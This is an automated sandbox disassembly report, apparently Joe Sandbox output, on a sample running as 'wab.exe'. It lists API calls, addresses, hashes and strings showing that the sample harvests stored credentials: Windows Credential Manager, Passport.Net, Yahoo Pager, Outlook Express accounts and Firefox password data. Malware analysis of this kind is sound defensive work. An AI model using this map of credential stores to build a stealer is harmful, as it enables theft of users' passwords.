                    • String ID: %2.2X
                    • API String ID: 125969286-791839006
                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                    APIs
                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                    • CloseHandle.KERNEL32(?), ref: 00444206
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                    • String ID: ACD
                    • API String ID: 1886237854-620537770
                    • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                    • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                    APIs
                    • memset.MSVCRT ref: 004091EC
                    • sprintf.MSVCRT ref: 00409201
                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                    • SetWindowTextA.USER32(?,?), ref: 00409228
                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                    • String ID: caption$dialog_%d
                    • API String ID: 2923679083-4161923789
                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                    • memset.MSVCRT ref: 00410246
                    • memset.MSVCRT ref: 00410258
                      • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                    • memset.MSVCRT ref: 0041033F
                    • _mbscpy.MSVCRT ref: 00410364
                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 3974772901-0
                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                    APIs
                    • wcslen.MSVCRT ref: 0044406C
                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                    • strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                    • memcpy.MSVCRT ref: 004440EB
                    • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                    • String ID:
                    • API String ID: 577244452-0
                    • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                    • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                    APIs
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • _strcmpi.MSVCRT ref: 00404518
                    • _strcmpi.MSVCRT ref: 00404536
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$memcpystrlen
                    • String ID: imap$pop3$smtp
                    • API String ID: 2025310588-821077329
                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                    APIs
                    • memset.MSVCRT ref: 0040C02D
                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                      • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                      • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2726666094-3614832568
                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                    • OpenClipboard.USER32(?), ref: 0040C1B1
                    • GetLastError.KERNEL32 ref: 0040C1CA
                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                    • String ID:
                    • API String ID: 2014771361-0
                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                    APIs
                    • memcmp.MSVCRT ref: 00406151
                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                    • memcmp.MSVCRT ref: 0040617C
                    • memcmp.MSVCRT ref: 004061A4
                    • memcpy.MSVCRT ref: 004061C1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: global-salt$password-check
                    • API String ID: 231171946-3927197501
                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                    • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004016A3
                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                    • BeginPaint.USER32(?,?), ref: 004016D7
                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                    • EndPaint.USER32(?,?), ref: 004016F3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                    • String ID:
                    • API String ID: 19018683-0
                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                    APIs
                    • memset.MSVCRT ref: 0040644F
                    • memcpy.MSVCRT ref: 00406462
                    • memcpy.MSVCRT ref: 00406475
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                    • memcpy.MSVCRT ref: 004064B9
                    • memcpy.MSVCRT ref: 004064CC
                    • memcpy.MSVCRT ref: 004064F9
                    • memcpy.MSVCRT ref: 0040650E
                      • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                    APIs
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                    • strlen.MSVCRT ref: 0040F7BE
                    • _mbscpy.MSVCRT ref: 0040F7CF
                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                    • String ID: Passport.Net\*
                    • API String ID: 2329438634-3671122194
                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                    APIs
                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                    • memset.MSVCRT ref: 0040330B
                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                    • strchr.MSVCRT ref: 0040335A
                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                    • strlen.MSVCRT ref: 0040339C
                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                    • String ID: Personalities
                    • API String ID: 2103853322-4287407858
                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                    APIs
                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                    • memcpy.MSVCRT ref: 004108C3
                    Strings
                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FromStringUuid$memcpy
                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                    • API String ID: 2859077140-3316789007
                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                    APIs
                    • memset.MSVCRT ref: 00444573
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValuememset
                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                    • API String ID: 1830152886-1703613266
                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: H
                    • API String ID: 2221118986-2852464175
                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                    • API String ID: 3510742995-3170954634
                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: winWrite1$winWrite2
                    • API String ID: 438689982-3457389245
                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: winRead
                    • API String ID: 1297977491-2759563040
                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                    APIs
                    • GetParent.USER32(?), ref: 004090C2
                    • GetWindowRect.USER32(?,?), ref: 004090CF
                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                    APIs
                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                    • GetSysColor.USER32(00000005), ref: 004107A6
                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                    • String ID:
                    • API String ID: 2775283111-0
                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: winSeekFile$winTruncate1$winTruncate2
                    • API String ID: 885266447-2471937615
